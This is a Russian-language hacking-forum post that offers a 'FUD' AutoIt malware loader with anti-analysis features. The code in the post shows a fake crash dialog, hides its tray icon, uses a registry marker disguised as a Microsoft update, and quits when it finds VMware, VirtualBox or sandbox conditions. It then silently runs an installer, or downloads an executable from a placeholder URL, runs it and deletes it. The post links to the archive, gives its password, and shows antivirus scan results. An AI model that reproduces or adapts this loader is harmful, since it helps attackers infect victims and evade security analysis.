РокетБанк [debit_cards][sale] Точка банк Эквайринг [sale] Восточный Экспресс Дебетовая карта [debit card][sale]

Анти-Виртуалка, скрытый загрузчик на Autoit. (FUD)

RERCON

Администратор
Команда форума
#1
В данной статье рассмотрим скрипт запрещающий установку вашего вЕруса на виртуальные машины , песочницы.
Вдруг кто не знал, полезно будет.
Особенности:
При запуске выводится ошибка
82c5aaa7d40fdf0093598c24e2d10149-full.png

Запрет на повторный запуск
Скрывает иконку в трее
При определении виртуалки\песочницы вывод сообщения.
Кстати, .exe будет FUD
Сам код:

Код:
#NoTrayIcon ;Скрывает иконку в трее

sleep (1500)
MsgBox(16, "Application Error", "Ошибка при запуске приложения (0xc0000005). Для выхода из приложения нажмите кнопку ОК.") ;вывод фейк сообщения


;запрет на повторный запуск проверка через реестр

$var = RegRead("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz")
If $var = "1" Then RegWrite("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz", "REG_SZ", "0")
$1 = Abs ($var+1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz", "REG_SZ", $1)
$var1 = RegRead("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz")
If $var1 > "1" Then
   sleep (500)
   exit
  EndIf


;запрещает запуск на виртуальной машине

;AVWare - виртуалка
If ProcessExists("VGAuthService.exe") Then
 MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
 sleep (50)
 exit
EndIf

;VirtualBox - виртуалка
If ProcessExists("VBoxService.exe") Then
 MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
 sleep (50)
 exit
EndIf

;запрет на запуск в песочнице

If _processuser(@AutoItPID) <> @UserName Then MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
   sleep (1000)
If _processuser(@AutoItPID) <> @UserName Then Exit

Func _processuser($ipid)
   Local Const $wbemflagreturnimmediately = 16
   Local Const $wbemflagforwardonly = 32
   Local $username = ""
   Local $objwmiservice = ObjGet("winmgmts://./root/cimv2")
   Local $colpid = $objwmiservice.execquery("Select * from Win32_Process Where ProcessID ='" & $ipid & "'", "WQL", $wbemflagreturnimmediately + $wbemflagforwardonly)
   For $objpid In $colpid
       If $objpid.processid = $ipid Then
           $objpid.getowner($username)
           ExitLoop
       EndIf
   Next
   Return $username
EndFunc

ShellExecuteWait(@ScriptDir & "\install.bat", "", @SW_HIDE)
последняя строка - запуск инсталера в формате .bat . Если у вас инсталер в формате .exe то переименуйте соответственно.

Либо используйте загрузку собраного вируса с FTP(код писать вместо последней строки кода выше)

Код:
Sleep(0)
dl("http:\\site\file.exe", "file.exe")
If FileExists(@UserProfileDir & "\" & "file.exe") Then
 ShellExecute (@UserProfileDir & "\" & "file.exe")
EndIf

Func dl($url, $file)
   $ohttp = ObjCreate("winhttp.winhttprequest.5.1")
   $ohttp.open("GET", $url)
   $ohttp.send()
   $htmlsource = $ohttp.responsebody
   FileOpen(@UserProfileDir  & "\" & $file, 16)
   FileWrite(@UserProfileDir  & "\" & $file, $htmlsource)
   FileClose(@UserProfileDir  & "\" & $file)
EndFunc

 Sleep (10000)
   FileDelete(@UserProfileDir & "\" & "file.exe")
Где меняем http:\\site\file.exe на ссылку с вашим стабом

скачать
У Вас недостаточно прав для просмотра ссылок. Войдите или зарегистрируйтесь.

pass rat-club.su
Скан архива что БЕЗ ПАРОЛЯ
У Вас недостаточно прав для просмотра ссылок. Войдите или зарегистрируйтесь.


Скан собраного exe
У Вас недостаточно прав для просмотра ссылок. Войдите или зарегистрируйтесь.
 

Сверху